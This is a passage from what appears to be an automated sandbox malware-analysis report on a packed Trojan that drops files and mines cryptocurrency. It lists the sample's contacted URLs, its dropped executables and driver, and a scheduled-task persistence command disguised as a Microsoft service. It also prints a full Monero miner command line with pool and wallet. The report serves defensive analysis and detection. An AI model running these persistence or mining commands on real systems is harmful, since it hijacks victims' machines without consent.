              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/dance.exed
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/mex.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com4
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.comD8
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://d.symcb.com/rpa0.
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1r2et7
              Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmpString found in binary or memory: https://iplogger.org/1tsef7
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/WmBNYXYN
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RP
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com4
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.comD8
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283801731.00000000032C0000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: pg2bsuqa.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2

              System Summary:

              barindex
              PE file contains section with special charsShow sources
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to behavior
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeCode function: 4_2_003D1D30
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeCode function: 4_2_003D4928
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\pg2bsuqa.exe 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\zmql3v0y.exe 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: invalid certificate
              Source: pg2bsuqa.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: cpu.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: pg2bsuqa.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000003.237103950.0000000000F40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284646419.0000000006030000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280825476.0000000001100000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeBinary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Section: ZLIB complexity 0.989800347222
              Source: WinRing0x64.sys.6.drBinary string: \Device\WinRing0_1_2_0
              Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@13/9@9/5
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile created: C:\Users\user\AppData\Local\pg2bsuqa.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeMutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeMetadefender: Detection: 21%
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeReversingLabs: Detection: 28%
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic file information: File size 2817248 > 1048576
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x2a7200
              Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

              Data Obfuscation:

              barindex
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeUnpacked PE file: 0.2.SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.2e0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeUnpacked PE file: 6.2.zmql3v0y.exe.b30000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeUnpacked PE file: 15.2.RantimeBroker.exe.d80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Binary contains a suspicious time stampShow sources
              Source: initial sampleStatic PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
              Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
              Source: zmql3v0y.exe.0.drStatic PE information: real checksum: 0x280d9c should be: 0x285c9a
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: real checksum: 0x2b2b3a should be: 0x2b9e3b
              Source: RantimeBroker.exe.6.drStatic PE information: real checksum: 0x280d9c should be: 0x285c9a
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name: .themida
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name: .boot
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .apk0
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .themida
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .boot
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .apk1
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .apk2
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name: .themida
              Source: zmql3v0y.exe.0.drStatic PE information: section name: .boot
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name: .themida
              Source: RantimeBroker.exe.6.drStatic PE information: section name: .boot
              Source: cpu.exe.6.drStatic PE information: section name: _RANDOMX
              Source: cpu.exe.6.drStatic PE information: section name: _SHA3_25
              Source: cpu.exe.6.drStatic PE information: section name: _TEXT_CN
              Source: cpu.exe.6.drStatic PE information: section name: _TEXT_CN
              Source: cpu.exe.6.drStatic PE information: section name: _RDATA
              Source: cpu.exe.6.drStatic PE information: section name: 0
              Source: cpu.exe.6.drStatic PE information: section name: 1
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeCode function: 4_2_003D8570 push ecx; ret
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeCode function: 15_2_03CA0007 push es; retf 0003h
              Source: initial sampleStatic PE information: section name: entropy: 7.58163620158
              Source: initial sampleStatic PE information: section name: entropy: 7.89210158409
              Source: initial sampleStatic PE information: section name: entropy: 7.89210158409

              Persistence and Installation Behavior:

              barindex
              Sample is not signed and drops a device driverShow sources
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile created: C:\Users\user\AppData\Local\zmql3v0y.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile created: C:\Users\user\AppData\Local\pg2bsuqa.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
